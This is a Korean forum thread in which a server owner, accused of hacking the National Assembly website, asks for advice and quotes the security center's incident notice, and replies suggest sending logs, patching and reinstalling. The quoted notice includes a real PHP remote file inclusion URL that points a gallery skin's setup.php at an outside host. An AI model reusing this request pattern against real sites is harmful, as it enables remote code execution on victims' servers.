제서버가 PHP injection 공격을 당해서 제가 국회 홈피를 해킹시도한걸로 오인받았습니다.

Fedora의 이미지

내용은 아래와 같습니다.

저는 해킹시도한적이 없는데 누가 제서버를 거쳐서 아래와 같이 공격을 시도해서

제가 해킹한걸로 오해를 받고 있습니다.

이거 어떻게 대처해야 될까요?

로그 분석 방법과 재발 대처방법에 대하여 조언을 부탁드립니다(__)

-------------------------------------------------------
KT 스팸대응센터

Tel : 080-223-xxx
E-mail : xxx@kornet.net

----- Original Message -----
From: 국회보안관제센터
To: xxx@kornet.net ; xxx@kornet.net ; xxx@krnic.kornet.net
Sent: Friday, January 08, 2010 5:07 AM
Subject: KT에 할당된 아이피에서 침해시도가 발생 하였습니다. -국회보안관제센터-


안녕하십니까.

국회 보안관제센터입니다.

KT에 할당된 아이피 125.141.91.xxx에서 국회 웹서버로 PHP injection 공격이 발생 했습니다.

-일시 2010년 1월 8일 오전 3시 6분경

-src IP : 125.141.91.xxx

-dst IP : 211.46.92.xxx

-공격 내용 : PHP인젝션

-공격URL = www.***.go.kr/renew07/anc/notice/popup_mng/popup_vw.j&hellip://skin/sirini_simplism_gallery_v4/setup.php?dir=http://musicadelibreria.net/footer??

상기 내역은 보안상 로그중 일부만 발췌하여 공개 하였으며, src IP에 대해 80포트로 접속 해 본 결과

웹서버로 확인되어 해당 아이피에 대해 차단 하였습니다.



조치 후 회신 요청 드립니다.

수고하십시요.


국회 보안관제센터

02-786-xxxx

relipmoc의 이미지

웹 서버 PHP 인젝션을 시도한 아파치 Access 로그를 KT 측에 보내면 되지 않을까요?

==================================================

whitelazy의 이미지

조치후 회신 요청이라니까 어떻게 대응했는지 보내면 되겠네요
서버 운영중이시면 재설치후 보안패치 다 했다던가
뚤린 php 프로그램을 최신 보안패치까지 다 했다던가
인젝션 공격한 놈 ip를 차단했다던가 해서 이런이런 보안조치를 취했다 하고 미안하다 라고 보내시면 될꺼같군요...

익명 사용자의 이미지

+ 보안조치

댓글 달기

Filtered HTML

  • 텍스트에 BBCode 태그를 사용할 수 있습니다. URL은 자동으로 링크 됩니다.
  • 사용할 수 있는 HTML 태그: <p><div><span><br><a><em><strong><del><ins><b><i><u><s><pre><code><cite><blockquote><ul><ol><li><dl><dt><dd><table><tr><td><th><thead><tbody><h1><h2><h3><h4><h5><h6><img><embed><object><param><hr>
  • 다음 태그를 이용하여 소스 코드 구문 강조를 할 수 있습니다: <code>, <blockcode>, <apache>, <applescript>, <autoconf>, <awk>, <bash>, <c>, <cpp>, <css>, <diff>, <drupal5>, <drupal6>, <gdb>, <html>, <html5>, <java>, <javascript>, <ldif>, <lua>, <make>, <mysql>, <perl>, <perl6>, <php>, <pgsql>, <proftpd>, <python>, <reg>, <spec>, <ruby>. 지원하는 태그 형식: <foo>, [foo].
  • web 주소와/이메일 주소를 클릭할 수 있는 링크로 자동으로 바꿉니다.

BBCode

  • 텍스트에 BBCode 태그를 사용할 수 있습니다. URL은 자동으로 링크 됩니다.
  • 다음 태그를 이용하여 소스 코드 구문 강조를 할 수 있습니다: <code>, <blockcode>, <apache>, <applescript>, <autoconf>, <awk>, <bash>, <c>, <cpp>, <css>, <diff>, <drupal5>, <drupal6>, <gdb>, <html>, <html5>, <java>, <javascript>, <ldif>, <lua>, <make>, <mysql>, <perl>, <perl6>, <php>, <pgsql>, <proftpd>, <python>, <reg>, <spec>, <ruby>. 지원하는 태그 형식: <foo>, [foo].
  • 사용할 수 있는 HTML 태그: <p><div><span><br><a><em><strong><del><ins><b><i><u><s><pre><code><cite><blockquote><ul><ol><li><dl><dt><dd><table><tr><td><th><thead><tbody><h1><h2><h3><h4><h5><h6><img><embed><object><param>
  • web 주소와/이메일 주소를 클릭할 수 있는 링크로 자동으로 바꿉니다.

Textile

  • 다음 태그를 이용하여 소스 코드 구문 강조를 할 수 있습니다: <code>, <blockcode>, <apache>, <applescript>, <autoconf>, <awk>, <bash>, <c>, <cpp>, <css>, <diff>, <drupal5>, <drupal6>, <gdb>, <html>, <html5>, <java>, <javascript>, <ldif>, <lua>, <make>, <mysql>, <perl>, <perl6>, <php>, <pgsql>, <proftpd>, <python>, <reg>, <spec>, <ruby>. 지원하는 태그 형식: <foo>, [foo].
  • You can use Textile markup to format text.
  • 사용할 수 있는 HTML 태그: <p><div><span><br><a><em><strong><del><ins><b><i><u><s><pre><code><cite><blockquote><ul><ol><li><dl><dt><dd><table><tr><td><th><thead><tbody><h1><h2><h3><h4><h5><h6><img><embed><object><param><hr>

Markdown

  • 다음 태그를 이용하여 소스 코드 구문 강조를 할 수 있습니다: <code>, <blockcode>, <apache>, <applescript>, <autoconf>, <awk>, <bash>, <c>, <cpp>, <css>, <diff>, <drupal5>, <drupal6>, <gdb>, <html>, <html5>, <java>, <javascript>, <ldif>, <lua>, <make>, <mysql>, <perl>, <perl6>, <php>, <pgsql>, <proftpd>, <python>, <reg>, <spec>, <ruby>. 지원하는 태그 형식: <foo>, [foo].
  • Quick Tips:
    • Two or more spaces at a line's end = Line break
    • Double returns = Paragraph
    • *Single asterisks* or _single underscores_ = Emphasis
    • **Double** or __double__ = Strong
    • This is [a link](http://the.link.example.com "The optional title text")
    For complete details on the Markdown syntax, see the Markdown documentation and Markdown Extra documentation for tables, footnotes, and more.
  • web 주소와/이메일 주소를 클릭할 수 있는 링크로 자동으로 바꿉니다.
  • 사용할 수 있는 HTML 태그: <p><div><span><br><a><em><strong><del><ins><b><i><u><s><pre><code><cite><blockquote><ul><ol><li><dl><dt><dd><table><tr><td><th><thead><tbody><h1><h2><h3><h4><h5><h6><img><embed><object><param><hr>

Plain text

  • HTML 태그를 사용할 수 없습니다.
  • web 주소와/이메일 주소를 클릭할 수 있는 링크로 자동으로 바꿉니다.
  • 줄과 단락은 자동으로 분리됩니다.
댓글 첨부 파일
이 댓글에 이미지나 파일을 업로드 합니다.
파일 크기는 8 MB보다 작아야 합니다.
허용할 파일 형식: txt pdf doc xls gif jpg jpeg mp3 png rar zip.
CAPTCHA
이것은 자동으로 스팸을 올리는 것을 막기 위해서 제공됩니다.